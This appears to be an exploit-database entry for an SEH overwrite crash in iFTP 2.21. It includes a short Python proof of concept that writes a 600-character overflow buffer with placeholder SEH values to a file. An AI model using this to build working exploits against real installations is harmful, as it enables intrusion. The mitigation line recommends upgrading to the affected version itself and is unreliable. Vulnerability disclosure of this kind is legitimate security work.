header-logo
Suggest Exploit
vendor:
iFTP
by:
Avinash Kumar Thapa '-Acid'
7.8
CVSS
HIGH
SEH Overwrite
119
CWE
Product Name: iFTP
Affected Version From: 2.21
Affected Version To: 2.21
Patch Exists: YES
Related CWE: N/A
CPE: a:memecode:iftp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2015

iFTP 2.21 SEH overwritten Crash PoC

iFTP 2.21 is vulnerable to a SEH overwrite vulnerability. This vulnerability can be triggered by sending a specially crafted file to the application. The application will crash when the user attempts to go to the Schedule > Schedule download > {+} >Time field. The specially crafted file contains a buffer of 600 A's followed by 4 B's and 4 C's.

Mitigation:

Upgrade to the latest version of iFTP 2.21
Source

Exploit-DB raw data:

# iFTP 2.21 SEH overwritten Crash PoC
# Author: Avinash Kumar Thapa "-Acid"
# Date of Testing :  28th April'2015
# Vendor's home page: http://www.memecode.com/iftp.php
# Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Crash Point: Go to Schedule > Schedule download > {+} >Time field


buffer = "A"*600

buffer += "BBBB" # Pointer to Next SEH Record

buffer += "CCCC" # SEH HANDLER


file = "test.txt"

f = open(file, "w")

f.write(buffer)

f.close()

Navigation

Suggest Exploit

Services By CQR